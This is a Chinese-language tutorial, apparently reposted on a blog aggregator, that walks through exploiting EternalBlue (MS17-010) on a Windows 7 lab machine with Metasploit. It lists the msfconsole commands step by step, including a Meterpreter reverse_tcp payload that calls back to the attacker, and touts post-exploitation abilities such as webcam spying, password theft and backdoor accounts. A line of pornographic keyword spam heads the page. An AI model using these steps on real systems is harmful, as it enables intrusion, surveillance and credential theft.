日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > windows >内容正文

windows

在Kali操作系统上使用metasploit

發布時間:2024/3/13 windows 45 豆豆
生活随笔 收集整理的這篇文章主要介紹了 在Kali操作系统上使用metasploit 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

目錄

<一>:metasploit 簡述

<二>:msf 使用法則

<三>:啟動 metasploit 前需要做的事項

<四>:metasploit 攻擊 windows 系統

?????????metasploit 攻擊 eternalblue(永恒之藍)全流程:

??????????????? (1):使用模塊

??????????????? (2):配置模塊必選項

??????????????? (3):運行模塊

????????????? (4):設置必選項(補充)

<五>:meterpreter 攻擊成功后能做什么



<一>:metasploit 簡述

??????????????? metasploit 簡稱 msf,是一款開源安全漏洞利用和測試工具,集成了各種平臺上常見的溢出漏洞和流行的 shellcode,并持續保持更新。

<二>:msf 使用法則

??????????????? 使用模塊 ->配置模塊必選項->運行模塊

<三>:啟動 metasploit 前需要做的事項

??????????????? ①:打開Kali終端

??????????????? ②:使用sudo su 命令,并輸入 Kali 的密碼,切換至root用戶

??????????????? ③:使用 msfdb init 命令初始化 metasploit 數據庫(*可選)

<四>:metasploit 攻擊 windows 系統

??????????????? msfconsole:啟動 metasploit 命令行 (命令行效率高,方便使用)

?????????metasploit 攻擊 eternalblue(永恒之藍)全流程:

??????????????? (1):使用模塊

???????????????????????????????①:搜索微軟給永恒之藍的漏洞號:search ms17_010

?????????????????????????????? ②: 使用此漏洞:use exploit/windows/smb/ms17_010_eternalblue

??????????????? (2):配置模塊必選項

??????????????????????????????? 查看必選項[*required 為 yes 的就是必選項]

????????????????????????????????????????①:show options (查看設置)

????????????????(3):運行模塊

?????????????????????????????????? 以虛擬機上的xin7操作系統為靶機為例 (先同時按win+R,然后輸入cmd,回車,最后輸入ipconfig,查看被攻擊的靶機IP地址)

????????????????????????????????????????①:set RHosts 被攻擊的IP地址

????????????????????????????????????????②:show options (查看是否還有必選項需要修改)

????????????????????????????????????????③:set LPORT 0~65536 (為了防止攻擊失敗多設置一個)

????????????????????????????????????????④:run (攻擊操作系統,并獲取命令運行最低權限)

?

(注:顯示攻擊失敗表示目標主機上沒有此漏洞,此漏洞只適用于攻擊自己的win7靶機,高版本的系統已經修復此漏洞,顯示WIN 表示攻擊成功,其他則是失敗)

????????????? (4):設置必選項(補充)

???????????????????????????????????①: set RHosts 被攻擊的IP地址

??????????????????????????????????????? [*RHOSTS 為 target host(s)代表要攻擊誰]

?????????????????????????????????? ②: set Payload windows/x64/meterpreter/reverse_tcp

???????????????????????????????????????? [*Payload 是攻擊載荷,就是攻擊完成后想獲取的東西,這里是想獲取 meterpreter]

????????????????????????????????????????[*meterpreter 是metasploit 后滲透的神器 ]

???????????????????????????????? ③:set LHOST 攻擊的IP地址

??????????????????????????????????????? [*LHOST 為 listen host 代表你是誰]

??????????????????????????????? ④:set LPORT 攻擊方使用的監聽端口

??????????????????????????????????????? [* LPORT 為 listen port 代表要在攻擊方上開啟的端口,1~65535隨便選,但不能被占用]

??????????????????? (5):meterpreter 后輸入 help,可顯示攻擊成功后可用的權限

<五>:meterpreter 攻擊成功后能做什么

??????????????? meterpreter 是強大的后滲透模塊,可以輸入help 查看幫助信息,遠程控制、命令執行、攝像頭監控、密碼獲取、創建后門用戶、破壞篡改系統.......這些看起來非常復雜又高級的操作都能用meterpreter 中的一行或幾個字母,簡單的命令完成。

(注:此文章及操作流程只限于學習交流,請勿進行非法操作,做遵紀守法公民)

總結

以上是生活随笔為你收集整理的在Kali操作系统上使用metasploit的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。